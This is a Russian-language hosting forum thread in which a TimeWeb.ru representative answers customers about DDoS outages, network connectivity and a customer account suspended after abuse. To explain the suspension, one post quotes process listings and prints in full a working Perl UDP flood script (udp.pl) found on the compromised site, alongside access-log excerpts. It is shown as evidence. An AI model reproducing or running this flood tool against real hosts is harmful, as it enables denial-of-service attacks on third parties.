TimeWeb.ru

Добрый,

Недавние проблемы были вызваны мощной ddos атакой, к сожалению, подобные проблемы иногда случаются.

В настоящее время мы работаем над усовершенствованием защиты от ддос.

Добрый всем,

Ничего не мешало, после первой проблемы - данные были доступны, в другой папке. После второй - доступ был закрыт.

Разумеется - данные клиента - его собственность, мы их ни при каких обстоятельствах "утаивать?" не должны и не делаем этого, здесь больше вопрос безопасности.

TimeWeb.ru добавил 09.02.2011 в 12:49

1. В первый раз, не так подробно, но данные были предоставлены. Кроме того, предоставленные мною данные - не закрыты, это вырезки логов, которые доступны и клиенту.

Время:	17.01.2011 21:50:43
perseus x # ls -la /x/
total 8

-rw-r--r-- 1 x x 1025 Oct 29 2006 udp.pl
-rw-r--r-- 1 x x 552 Sep 24 19:04 udp.tar

Который атаковал при помощи UDP трафика внешние адреса:

| | `-httpd,21602,x
| | `-sh,21608 -c cd\040/x;perl\040udp.pl\04087.98.227.151\0400\0400
| | `-perl,21609 udp.pl 87.98.227.151 0 0

Ваши файлы перенесены в директорию JUST_FTP.

Вам необходимо произвести обновление всех публичных движков ваших сайтов, после чего сообщить нам о проведённом обновлении.

--
С уважением,
Бойков Александр.

Второй раз - нет.

2. Конечно. Зачем нам не отдавать данные клиенту.

Разрешите пару слов по теме,

Первая проблема данного пользователя была зафиксирована 17 января, после чего - пользователь получил уведомление о данной проблеме и требование устранить уязвимость.

     |       |-httpd(nobody)---httpd(xxxxxxxx)---sh---perl



perseus xxxxx # ls -la ...



-rw-r--r--  1 xxxxxx customers  1025 Oct 29  2006 udp.pl

-rw-r--r--  1 xxxxxx customers   552 Sep 24 19:04 udp.tar

cat x/udp.pl (чур не пользоваться 🚬)

#!/usr/bin/perl





use Socket;



$ARGC=@ARGV;



if ($ARGC !=3) {

 printf "$0 <ip> <port> <time>\n";

 printf "for any info vizit http://hacking.3xforum.ro/ \n";

 exit(1);

}



my ($ip,$port,$size,$time);

 $ip=$ARGV[0];

 $port=$ARGV[1];

 $time=$ARGV[2];



socket(crazy, PF_INET, SOCK_DGRAM, 17);

    $iaddr = inet_aton("$ip");



printf "Amu Floodez $ip pe portu $port \n";

printf "daca nu pica in 10 min dai pe alt port \n";



if ($ARGV[1] ==0 && $ARGV[2] ==0) {

 goto randpackets;

}

if ($ARGV[1] !=0 && $ARGV[2] !=0) {

 system("(sleep $time;killall -9 udp) &");

 goto packets;

}

if ($ARGV[1] !=0 && $ARGV[2] ==0) {

 goto packets;

}

if ($ARGV[1] ==0 && $ARGV[2] !=0) {

 system("(sleep $time;killall -9 udp) &");

 goto randpackets;

}



packets:

for (;;) {

 $size=$rand x $rand x $rand;

 send(crazy, 0, $size, sockaddr_in($port, $iaddr));

}



randpackets:

for (;;) {

 $size=$rand x $rand x $rand;

 $port=int(rand 65000) +1;

 send(crazy, 0, $size, sockaddr_in($port, $iaddr));

}

Файлы сайтов были перенесены в папку JUST_FTP, аккаунт при этом не блокировался.

Здесь обнаруживается, что пользователь не в курсе, совсем.

----------------------

Время:	18.01.2011 07:35:44

Размещали сайты в /JUST_FTP вы, а не мы. Мы не трогали вообще ничего. Понимаете, я просто владею сайтами, и не знаю, как и что переносится. Пока я буду искать исполнителя для этого форсмажора, то время уйдет непонятно сколько. Сайты забанит Яндекс и я понесу убытки.

Неужели нельзя сообщить С КАКИМ ИМЕННО САЙТОМ ПРОБЛЕМА и запустить остальные?

Хост ЦМС дико нервничает, что в их движке дырка, тоже хочет знать где именно. 

----------------------

Далее, наш сотрудник помог вернуть сайты в рабочее состояние

===================================

От:	Евгений Пленов (техническая поддержка)

Время:	18.01.2011 08:10:20

	

Расположение xxx.com/ поправили. Проверьте пожалуйста сейчас.

Если с остальными есть проблемы укажите пожалуйста где именно. От нас они безошибочно работают.

===================================

Через некоторое время - проблема повторилась, пользователь был закрыт.

Проблем с доступом к данным у пользователя быть не должно. Возврат остатка средств осуществляется по типовой схеме.

В результате, все просто

www.x.com 188.173.208.44 - - [06/Feb/2011:18:45:32 +0300] "POST /chat/data.php HTTP/1.0" 200 1195 "http://www.x.com/chat/data.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10"

www.x.com 188.173.208.44 - - [06/Feb/2011:18:46:00 +0300] "POST /chat/data.php HTTP/1.0" 200 1226 "http://www.x.com/chat/data.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10"

www.x.com 188.173.208.44 - - [06/Feb/2011:18:46:46 +0300] "POST /chat/data.php HTTP/1.0" 200 1226 "http://www.x.com/chat/data.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10"

www.x.com 188.173.208.44 - - [06/Feb/2011:18:48:06 +0300] "POST /chat/data.php HTTP/1.0" 200 1226 "http://www.x.com/chat/data.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10"

www.x.com 188.173.208.44 - - [06/Feb/2011:18:50:21 +0300] "POST /chat/data.php HTTP/1.0" 200 1226 "http://www.x.com/chat/data.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10"

www.x.com 188.173.208.44 - - [06/Feb/2011:18:51:31 +0300] "POST /chat/data.php HTTP/1.0" 200 1226 "http://www.x.com/chat/data.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10"

www.x.com 188.173.208.44 - - [06/Feb/2011:18:52:11 +0300] "POST /chat/data.php HTTP/1.0" 200 1226 "http://www.x.com/chat/data.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10"

www.x.com 188.173.208.44 - - [06/Feb/2011:18:52:51 +0300] "POST /chat/data.php HTTP/1.0" 200 1226 "http://www.x.com/chat/data.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10"

www.x.com 188.173.208.44 - - [06/Feb/2011:18:54:02 +0300] "POST /chat/data.php HTTP/1.0" 200 1226 "http://www.x.com/chat/data.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10"

www.x.com 188.173.208.44 - - [06/Feb/2011:18:54:47 +0300] "POST /chat/data.php HTTP/1.0" 200 1226 "http://www.x.com/chat/data.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10"

www.x.com 188.173.208.44 - - [06/Feb/2011:18:55:32 +0300] "POST /chat/data.php HTTP/1.0" 200 1226 "http://www.x.com/chat/data.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10"

www.x.com 188.173.208.44 - - [06/Feb/2011:18:56:52 +0300] "POST /chat/data.php HTTP/1.0" 200 1226 "http://www.x.com/chat/data.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10"

www.x.com 188.173.208.44 - - [06/Feb/2011:18:57:27 +0300] "POST /chat/data.php HTTP/1.0" 200 1226 "http://www.x.com/chat/data.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10"

www.x.com 188.173.208.44 - - [06/Feb/2011:18:58:22 +0300] "POST /chat/data.php HTTP/1.0" 200 1226 "http://www.x.com/chat/data.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10"

В целом, клиента конечно можно понять, он заплатил деньги и получил проблемы. Вероятно стоит более качественно выбирать "партнеров" для "бизнеса"? Возможно.

Что касается компенсации - мы ее предоставляем только в том случае, когда клиент имеет проблему по нашей вине (человеческий фактор, аппаратная часть).

И, успехов всем нам.

Кстати, и в "этом" не мы виноваты =)

Добрый всем,

Сегодня действительно, примерно в 16:55 начался достаточно большой ддос.

В настоящее время проблема локализована и устранена, работа площадки стабилизирована.

Что касается серверов - мы следим за тем, чтобы нагрузка на них была в допустимых пределах и своевременно ставим новые серверы. Всегда.

ps.

Спасибо за поддержку!

bitrade, здесь действительно была странная проблема, определенный элемент везения есть везде, но здесь немного не этот случай =)

С Наступающим всех!

Добрый всем,

bitrade, вчера на одном из премиум-серверов была заменена вышедшая из строя оперативная память, нестабильная работа которой приводила к замедлению в работе сервера.

Ддос-атаки - это явление практически постоянное, особенно в "сезон". Атака может негативно влиять на работу атакуемого сервера, до тех пор, пока мы не примем необходмые меры.

Вся площадка при этом будет работать стабильно.

Добрый всем,

У нас прямое подключение к msk\spb-ix, в пределах Москвы - 10-12ms, в пределах СПб - 1ms

Разумеется, это справедливо для провайдеров, которые подключены к этим бонам.

+ два независимых взаимозаменяемых линка, в основном на Россию акцент конечно.

Добрый всем,

Дело в том, что в нашей системе - каждая отдельная папка в разделе "Управление сайтами" - это отдельный сайт.

И количество направленных на нее доменов или поддоменов не имеет значения.

То, что Вам советует наша поддержка - это своего рода, "обход" этого правила, ммм, пойду-ка поругаюсь 🚬

Все ответы даются только по существу вопросов. Вся техническая поддержка пользователей в рамках данного форума не осуществляется. У нас есть для этого специальные люди, пожалуйста, обращайтесь - support@timeweb.ru

Вероятно Ваш вопрос не имеет четкой трактовки. Ваш сайт заблокировали за нагрузку?

Каждый подобный случай сопровождается описанием проблемы администраторами и направляется пользователю. В Вашем случае - налицо системная проблема, Вам стоит разобраться в структуре работы Ваших сайтов.

"...да, и все мы конечно, черные и шерстяные..." (с) ;)

А, это запросто =)

Тут не все так просто. В нашем случае, чтобы подключить дополнительную услугу необходимо учесть много факторов.

Но есть и хорошие новости - у нас в ближайших планах глобальная переработка механизма работы дополнительных услуг, все будет делаться автоматически и сразу.

Всем,

Друзья, спасибо, стараемся. Мы любим свою работу =)